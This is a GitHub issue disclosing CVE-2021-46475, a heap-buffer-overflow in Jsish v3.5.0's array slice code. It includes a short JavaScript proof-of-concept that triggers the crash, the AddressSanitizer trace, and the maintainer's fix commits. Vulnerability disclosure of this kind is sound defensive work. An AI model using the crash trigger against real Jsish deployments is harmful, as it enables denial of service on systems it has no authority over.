Headline
CVE-2021-46475: Heap-buffer-overflow src/jsiArray.c:912 in jsi_ArraySliceCmd · Issue #64 · pcmacdon/jsish
Jsish v3.5.0 was discovered to contain a heap buffer overflow via jsi_ArraySliceCmd in src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS).
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Closed
hope-fly opened this issue
Dec 24, 2021
· 0 comments
Comments
Jsish revision
Commit: 9fa798e
Version: v3.5.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
export CFLAGS=’-fsanitize=address’ make
Test case
var arr = [ 'aa’, ‘bb’ ]; var results = []; arr.findIndex(function (V) { if (results.length === 0) { arr.slice(1, arr.push(‘cc’)); } }); results = []; arr = [ ‘mm’ ]; arr.findIndex(function (V) { if (results.length === 0) { arr.push(‘cc’); arr[1] = 'nn’; } results.push(V); });
Execution steps & Output
$ ./jsish/jsish poc.js
==87153==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c000018cc0 at pc 0x556c1807d671 bp 0x7ffc37cea3f0 sp 0x7ffc37cea3e0 READ of size 8 at 0x60c000018cc0 thread T0 #0 0x556c1807d670 in jsi_ArraySliceCmd src/jsiArray.c:912 #1 0x556c1804c818 in jsi_FuncCallSub src/jsiProto.c:244 #2 0x556c1831671a in jsiFunctionSubCall src/jsiEval.c:796 #3 0x556c1831671a in jsiEvalFunction src/jsiEval.c:837 #4 0x556c1831671a in jsiEvalCodeSub src/jsiEval.c:1264 #5 0x556c1832a15e in jsi_evalcode src/jsiEval.c:2204 #6 0x556c1804d834 in jsi_FuncCallSub src/jsiProto.c:220 #7 0x556c17fc9fec in jsi_FunctionInvoke src/jsiFunc.c:777 #8 0x556c17fc9fec in Jsi_FunctionInvoke src/jsiFunc.c:789 #9 0x556c1808ac0b in jsi_ArrayFindSubCmd src/jsiArray.c:576 #10 0x556c1808ac0b in jsi_ArrayFindIndexCmd src/jsiArray.c:666 #11 0x556c1804c818 in jsi_FuncCallSub src/jsiProto.c:244 #12 0x556c1831671a in jsiFunctionSubCall src/jsiEval.c:796 #13 0x556c1831671a in jsiEvalFunction src/jsiEval.c:837 #14 0x556c1831671a in jsiEvalCodeSub src/jsiEval.c:1264 #15 0x556c1832a15e in jsi_evalcode src/jsiEval.c:2204 #16 0x556c1832e274 in jsi_evalStrFile src/jsiEval.c:2665 #17 0x556c1801d66a in Jsi_Main src/jsiInterp.c:936 #18 0x556c1882203a in jsi_main src/main.c:47 #19 0x7f116a702bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #20 0x556c17fb1969 in _start (/usr/local/bin/jsish+0xe8969)
0x60c000018cc0 is located 0 bytes to the right of 128-byte region [0x60c000018c40,0x60c000018cc0) allocated by thread T0 here: #0 0x7f116b371f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x556c18022972 in Jsi_Realloc src/jsiUtils.c:47
SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiArray.c:912 in jsi_ArraySliceCmd Shadow bytes around the buggy address: 0x0c187fffb140: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c187fffb150: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c187fffb160: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c187fffb170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c187fffb180: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 =>0x0c187fffb190: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa 0x0c187fffb1a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c187fffb1b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c187fffb1c0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c187fffb1d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c187fffb1e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb
pcmacdon pushed a commit that referenced this issue
Dec 26, 2021
FossilOrigin-Name: 55bccdeeaece3664702082db63a25cac260ed809ceac21416f5d681a943905d7
pcmacdon pushed a commit that referenced this issue
Dec 26, 2021
…x to issue #64
FossilOrigin-Name: 18c3a7084f0cdf0aaf9dd27a591d6ed75f33b00be55439bd6d2acb979a6f1207
2 participants
